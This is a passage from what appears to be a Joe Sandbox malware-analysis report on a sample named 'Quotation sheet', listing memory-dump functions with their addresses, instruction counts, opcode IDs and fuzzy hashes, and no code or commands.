                                                                                                                        • Opcode ID: 8625edcb6b4c5884aab48ba439dffab994016edd38ac557495121fe0ef90c351
                                                                                                                        • Instruction ID: 41e8cf91b8079a3f6c6d07e029ff67249771bee4662e24ba01d341299b8e6566
                                                                                                                        • Opcode Fuzzy Hash: 8625edcb6b4c5884aab48ba439dffab994016edd38ac557495121fe0ef90c351
                                                                                                                        • Instruction Fuzzy Hash: 14E0BF78D05208EFD744DF98D5916ACFBB4EB88305F1082AAEC5967341D7719E42DB81
                                                                                                                        Function 094DDE20 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 60a3c217334b663e236efa6a5de0615ebf0aa37ca2351d11ac51d35fa8538a89
                                                                                                                        • Instruction ID: cf68188f172a528ec7f7dfe5ee957d349d5d610dfa759aef3b6d78e24b0c76d3
                                                                                                                        • Opcode Fuzzy Hash: 60a3c217334b663e236efa6a5de0615ebf0aa37ca2351d11ac51d35fa8538a89
                                                                                                                        • Instruction Fuzzy Hash: 61E0127580A208EBCB11EFA584106AE7BFCDB05211F0159AAD50993650EF714E409791
                                                                                                                        Function 094D0910 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f34e6a707f2b5c48ec71d3760c9d4257b41a7a11c435bde88e91fddcfab9b0ab
                                                                                                                        • Instruction ID: ea0208a6bdf9b687f14f005c1ee6d953648c81e99db752fac7c64a4a769108ea
                                                                                                                        • Opcode Fuzzy Hash: f34e6a707f2b5c48ec71d3760c9d4257b41a7a11c435bde88e91fddcfab9b0ab
                                                                                                                        • Instruction Fuzzy Hash: 19D017303501208FCA08AF6DD458DA977EAEF4AA21B4200EAF109CB372DA61EC01CB90
                                                                                                                        Function 094DF170 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ea22067ed332efb27e4b7f328e877cfef222f6548d6463055d8d6c5bbb057929
                                                                                                                        • Instruction ID: 55f1fbd49d3bda3b63d6b985a483d2f37f0cbd65a3e720d44e828abf8a8218e9
                                                                                                                        • Opcode Fuzzy Hash: ea22067ed332efb27e4b7f328e877cfef222f6548d6463055d8d6c5bbb057929
                                                                                                                        • Instruction Fuzzy Hash: D1E01238D19208FBC714DF94D95166DBBB4EB49304F5092D9DC0917341CB729E46DB91
                                                                                                                        Function 094DF258 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ea22067ed332efb27e4b7f328e877cfef222f6548d6463055d8d6c5bbb057929
                                                                                                                        • Instruction ID: 61b9066bffb214553926dc3ce6d43cca3f1d77ff3421a17700dececc5dfdfbc5
                                                                                                                        • Opcode Fuzzy Hash: ea22067ed332efb27e4b7f328e877cfef222f6548d6463055d8d6c5bbb057929
                                                                                                                        • Instruction Fuzzy Hash: D7E08C38919208EBCB14DF94D44166CBBB8AB46300F1081D9DC0913340CB329E46CB80
                                                                                                                        Function 094DC558 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ea22067ed332efb27e4b7f328e877cfef222f6548d6463055d8d6c5bbb057929
                                                                                                                        • Instruction ID: 7ec73505fd5a4dda9cfcebb7b435e8d9b09b6a306f94ca709195b430986aab57
                                                                                                                        • Opcode Fuzzy Hash: ea22067ed332efb27e4b7f328e877cfef222f6548d6463055d8d6c5bbb057929
                                                                                                                        • Instruction Fuzzy Hash: 3FE0C238D49208EBC708DF94D89166CBBB8EB46301F10819DDC4913380CB329E82CB84
                                                                                                                        Function 094D1C41 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4b8bcbf6820f7e8023ceaf0397f3b6468d7d4d42c0702edc71de2248c2de81cc
                                                                                                                        • Instruction ID: 5b5c912e68f069b4d7ebcadc0fc46fb6d06107e82e0166cbaae5d346d3203cfc
                                                                                                                        • Opcode Fuzzy Hash: 4b8bcbf6820f7e8023ceaf0397f3b6468d7d4d42c0702edc71de2248c2de81cc
                                                                                                                        • Instruction Fuzzy Hash: A1E04674606340CFE72AEF60E4948523BA2EB46201710C8AFC4485F721C736E888CB41
                                                                                                                        Function 094DC358 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0c8f7b3e67944e505248fc312ab022ba435ebec747b0b625c6ed1821573bfea3
                                                                                                                        • Instruction ID: e3311251847d79bf1a725835f759c8e257542720930f92eaf5606f5023e529c2
                                                                                                                        • Opcode Fuzzy Hash: 0c8f7b3e67944e505248fc312ab022ba435ebec747b0b625c6ed1821573bfea3
                                                                                                                        • Instruction Fuzzy Hash: E1D05E3894A208EBC704CA94D492A69B7A8EB46205F105199D80943351CB729E02C790
                                                                                                                        Function 094D6240 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 314765939ac28d96b45b044eeb5b9c5c1f5fbdc5976b477ddee2366683c73580
                                                                                                                        • Instruction ID: 4213b78067767d7e73c430072c36595dc027673a1fa7ede97dce2cc10ea92785
                                                                                                                        • Opcode Fuzzy Hash: 314765939ac28d96b45b044eeb5b9c5c1f5fbdc5976b477ddee2366683c73580
                                                                                                                        • Instruction Fuzzy Hash: 72D05E752052049FDF106FB2E91DB567FBCBB01350F01C026F500C1A24DB74C410CB61
                                                                                                                        Function 094D2620 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cc48fef6a42b23577cd431a4847270ac5061132711e952e376bd9de409825d80
                                                                                                                        • Instruction ID: b6cf1c2afba9f4961055e7dfd4c66934f0d1c9633560d081bd3947496939cd7c
                                                                                                                        • Opcode Fuzzy Hash: cc48fef6a42b23577cd431a4847270ac5061132711e952e376bd9de409825d80
                                                                                                                        • Instruction Fuzzy Hash: B1D05E36109018BFCF009BEAE814AC6BFA9FB49760F0AC05AE50887025C722F4129BD0
                                                                                                                        Function 094DF200 Relevance: .0, Instructions: 15COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aa244e7752f5feb893a3b0b83988c52b9ed9b98422205865b410f237cc8bfbf9
                                                                                                                        • Instruction ID: b774a9582e7efaaa678b257ce75b400ebea6776fa8ba2e1daf87d79745494655
                                                                                                                        • Opcode Fuzzy Hash: aa244e7752f5feb893a3b0b83988c52b9ed9b98422205865b410f237cc8bfbf9
                                                                                                                        • Instruction Fuzzy Hash: 03D0C939A1610CDF8750CF94E49147DBB79EB4E311F2051D6DC0A63741D7315E418A84
                                                                                                                        Function 094DEF48 Relevance: .0, Instructions: 14COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4d66c5e231562429be9ff93e7d4dcf88542ce6eda963f7e1e670ecb12a050756
                                                                                                                        • Instruction ID: 63312b3c1d3d1f945684a38f71f54ac2f828c5e29cea47bb9db825146d27028e
                                                                                                                        • Opcode Fuzzy Hash: 4d66c5e231562429be9ff93e7d4dcf88542ce6eda963f7e1e670ecb12a050756
                                                                                                                        • Instruction Fuzzy Hash: 94D0123B1442086E8B40EE95E840D53B7ECBB24740700C467F508CB520E621F574D765
                                                                                                                        Function 094DF203 Relevance: .0, Instructions: 14COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 81718686a246232ea50a11320956712c386495abcbcade38dbc85ca6940e723d
                                                                                                                        • Instruction ID: 0058eeee7bc30bbfee306c995efb14e427be3418f4fb7158bcd383a1e7339329
                                                                                                                        • Opcode Fuzzy Hash: 81718686a246232ea50a11320956712c386495abcbcade38dbc85ca6940e723d
                                                                                                                        • Instruction Fuzzy Hash: 19C08C3AA2E00CCBC720CAA0E4627BDBB39DB46311F2012D6D80B633808A324F028584
                                                                                                                        Function 094D6250 Relevance: .0, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ef0d4727bc580c7f4a0ddf14b7d0c971544a1d7cb9f31f948cfa156f77907e8
                                                                                                                        • Instruction ID: 9697a83e58fac60584711b63b4cc7b2811b065541637d6066d48566bd3202041
                                                                                                                        • Opcode Fuzzy Hash: 6ef0d4727bc580c7f4a0ddf14b7d0c971544a1d7cb9f31f948cfa156f77907e8
                                                                                                                        • Instruction Fuzzy Hash: 63D012742012089FDF106F71D91DB5A7BF8AB01751F01C036F905C2754DB75C455C675
                                                                                                                        Function 094D2630 Relevance: .0, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 36c8d84715cced0648064d2e925f8e3c8e37978aeb8b1174f5491f3a736f9e4e
                                                                                                                        • Instruction ID: f6fb9b7a8f2e536af4121f3432d53ca37f733b51aa9d749129ad222b38f8fcc7
                                                                                                                        • Opcode Fuzzy Hash: 36c8d84715cced0648064d2e925f8e3c8e37978aeb8b1174f5491f3a736f9e4e
                                                                                                                        • Instruction Fuzzy Hash: 20C012361040187B4A01AB85D800C86BBADAF49654304C05AE5088B121D722E55297D0
                                                                                                                        Function 094D0C1B Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7baa0dbf3fec7eb8ee9c010720808948863931c2a9828ed41ce4c1c18f5ae190
                                                                                                                        • Instruction ID: 9eafc8236c0a0945f61af45c5adea7e2eb43783794aec6d6daa81db12dfb8aa8
                                                                                                                        • Opcode Fuzzy Hash: 7baa0dbf3fec7eb8ee9c010720808948863931c2a9828ed41ce4c1c18f5ae190
                                                                                                                        • Instruction Fuzzy Hash: 36C0020154E3C54EE70757714C380922FF2096305074E91EB90C1CA5BBE24C094AEB26
                                                                                                                        Function 094D5BC8 Relevance: .0, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 71de8170a9f9420eb56d3f7804a91b0da2af1b6c09f7279b6c4fb0cd03462bc5
                                                                                                                        • Instruction ID: b9a906b0e570937fc0e8a909b67686cd0435474bad9cb22d090f66f73ad63b4b
                                                                                                                        • Opcode Fuzzy Hash: 71de8170a9f9420eb56d3f7804a91b0da2af1b6c09f7279b6c4fb0cd03462bc5
                                                                                                                        • Instruction Fuzzy Hash: 3FC0023604020DBBCF025EC1EC05EDA3F2AFB08750F048401FA191406987B39570ABA1
                                                                                                                        Function 094DC338 Relevance: .0, Instructions: 8COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 225b70876e06e5a6485419e1cef37b16de7dcd2834e07e3690aeb11e312b1fee
                                                                                                                        • Instruction ID: 485257cd86bf6698bc82cca944b616fdb32cb9c67100ad76fe51508e887e4999
                                                                                                                        • Opcode Fuzzy Hash: 225b70876e06e5a6485419e1cef37b16de7dcd2834e07e3690aeb11e312b1fee
                                                                                                                        • Instruction Fuzzy Hash: 26B0122D9DA300E3A00C2A644DF892A68D0EFB1B00F40EC0BB345004F4CEB14529D22B
                                                                                                                        Function 094DDC61 Relevance: .0, Instructions: 5COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 336e8f6f57cb86ea6f1dccda6013a30b557a662f52390eda29d0bf2a159b9d49
                                                                                                                        • Instruction ID: 101afe1e65f007be51aa95af63a23c70a17127e39ed7d2ee5e95546947e41df5
                                                                                                                        • Opcode Fuzzy Hash: 336e8f6f57cb86ea6f1dccda6013a30b557a662f52390eda29d0bf2a159b9d49
                                                                                                                        • Instruction Fuzzy Hash: CAB0122A410180E0A10811A04431D0990515BF4700700C41B6325304914E310030D6A6

                                                                                                                        Non-executed Functions

                                                                                                                        Function 078C6468 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fa0e5def26113e38447b32a25fb9e6f226d487fe91469203259982f77b201542
                                                                                                                        • Instruction ID: 1b42a16ae4b6a0e027040d068f6f2bd6d661ddf4fc86953d4a78614964d7349b
                                                                                                                        • Opcode Fuzzy Hash: fa0e5def26113e38447b32a25fb9e6f226d487fe91469203259982f77b201542
                                                                                                                        • Instruction Fuzzy Hash: 84E1F9B4E002598FDB14DFA9C590AAEFBB2FF89304F248269D454AB355D730AD42CF61
                                                                                                                        Function 078C80B8 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8c87a6e933f6449f9d4176672c1a2a63ef19c8fa19cb1618e3570a677e4921b5
                                                                                                                        • Instruction ID: fa57a95a0b4119298b3eb6dba68cda288c4777bf55d872b8bb24af19a9339e8c
                                                                                                                        • Opcode Fuzzy Hash: 8c87a6e933f6449f9d4176672c1a2a63ef19c8fa19cb1618e3570a677e4921b5
                                                                                                                        • Instruction Fuzzy Hash: DAE1E8B4E002598FDB14DFA9C580AAEFBB2FF89305F248269D454AB355D770AD42CF60
                                                                                                                        Function 078C6030 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 50d9de8fd52d20cb5c25f0d6aea835f54e696202e201600946685cf468fb9c6d
                                                                                                                        • Instruction ID: c6d9e8a9cf9989988c526aa84cc47e2b4b7ff61657a159599bb98e45960fa287
                                                                                                                        • Opcode Fuzzy Hash: 50d9de8fd52d20cb5c25f0d6aea835f54e696202e201600946685cf468fb9c6d
                                                                                                                        • Instruction Fuzzy Hash: 63E109B4E002598FDB14DFA9C580AAEFBB2FF89305F248269D454AB355D730AD42CF61
                                                                                                                        Function 078C5BF8 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bfcaf7afe2bdc8b1d664be9ce03daa5e970d13b0481cc6b4932db9d47ea89c17
                                                                                                                        • Instruction ID: 026196997aacf38e328a8572cf49054120b3a19f5297b5481ae937ff82f02627
                                                                                                                        • Opcode Fuzzy Hash: bfcaf7afe2bdc8b1d664be9ce03daa5e970d13b0481cc6b4932db9d47ea89c17
                                                                                                                        • Instruction Fuzzy Hash: 5CE10BB4E002598FDB14DFA9C580AAEFBB6FF89304F248269D454AB355D730AD42CF60
                                                                                                                        Function 078C68A0 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 752361291b1e7eaea6642008699ec905e64380300489b4ccfdc6f8acddddb0ec
                                                                                                                        • Instruction ID: 89034afe5127645c26171882a89a3fc357cd48d9ddf3f18853c1b45791e9bb67
                                                                                                                        • Opcode Fuzzy Hash: 752361291b1e7eaea6642008699ec905e64380300489b4ccfdc6f8acddddb0ec
                                                                                                                        • Instruction Fuzzy Hash: BFE1F9B4E002598FDB14DFA9C590AAEFBB2FF89304F248269D454AB355D731AD42CF60
                                                                                                                        Function 059D3C79 Relevance: .3, Instructions: 269COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 83fe55a1858fb17c79d0cf748013e110cb636271097778ae6294171fa8ef420d
                                                                                                                        • Instruction ID: c11f40438554473c951cb49dc1ccf04f862e55d45b7e5957423e007011a13a1f
                                                                                                                        • Opcode Fuzzy Hash: 83fe55a1858fb17c79d0cf748013e110cb636271097778ae6294171fa8ef420d
                                                                                                                        • Instruction Fuzzy Hash: DDD1D53182075ACADB20EB64D8906E9F7B1FF99300F509B9AE54937211EF746AC4CB80
                                                                                                                        Function 059D3C88 Relevance: .3, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0df33e8e93d3cfe0fdae81bd5d4d5d4b9265af8a3ff663fde911164598191956
                                                                                                                        • Instruction ID: 533f0514f2b788521edb1101913600d1bfb213f62bffb2a4a930a6382407489d
                                                                                                                        • Opcode Fuzzy Hash: 0df33e8e93d3cfe0fdae81bd5d4d5d4b9265af8a3ff663fde911164598191956
                                                                                                                        • Instruction Fuzzy Hash: DFD1D53182075ACADB20EB64D9906A9F7B1FFD9300F50DB9AD5493B211EF746AC4CB81
                                                                                                                        Function 094DAC5F Relevance: .2, Instructions: 248COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 899b21f4569dea536068b84e2d1dbc307ed26f3318ac6defb7cfaa33c3815724
                                                                                                                        • Instruction ID: c3a2e69c0902ff4d6101d3f7d43caefd07ede7148ad0801f1b0673cc10063a78
                                                                                                                        • Opcode Fuzzy Hash: 899b21f4569dea536068b84e2d1dbc307ed26f3318ac6defb7cfaa33c3815724
                                                                                                                        • Instruction Fuzzy Hash: 9EC18275E016188FDB28CF6AC9546DDBBF2BF88301F14C1AAD809AB364DB305A858F50
                                                                                                                        Function 094DAC10 Relevance: .2, Instructions: 248COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 95584c4323bc504a145ef772478489af634782bd7f45e34b09f06c53d3be4bb8
                                                                                                                        • Instruction ID: 3a860ca056d7fc1ae156b26c0e1cab3a7200925a580be043271ac43aeea85616
                                                                                                                        • Opcode Fuzzy Hash: 95584c4323bc504a145ef772478489af634782bd7f45e34b09f06c53d3be4bb8
                                                                                                                        • Instruction Fuzzy Hash: D5C19075E016588FDB58CF6AC994ADDBBF2BF89300F1480EAD409AB325DB315A85CF41
                                                                                                                        Function 094D6288 Relevance: .2, Instructions: 200COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c582ef58d30a6140aa0e991b5706ceab4399fea2bc139a2eec2c70b62d9ddb7
                                                                                                                        • Instruction ID: f256210339125566566b5cef0cd022cc85132e8818fc49d37862213bb88c6614
                                                                                                                        • Opcode Fuzzy Hash: 9c582ef58d30a6140aa0e991b5706ceab4399fea2bc139a2eec2c70b62d9ddb7
                                                                                                                        • Instruction Fuzzy Hash: B661D779A0261ACFCB14DF69C8A4A6FB7B6BFC5750F16812AD401D7364DB30E841CBA0
                                                                                                                        Function 094DA978 Relevance: .2, Instructions: 162COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
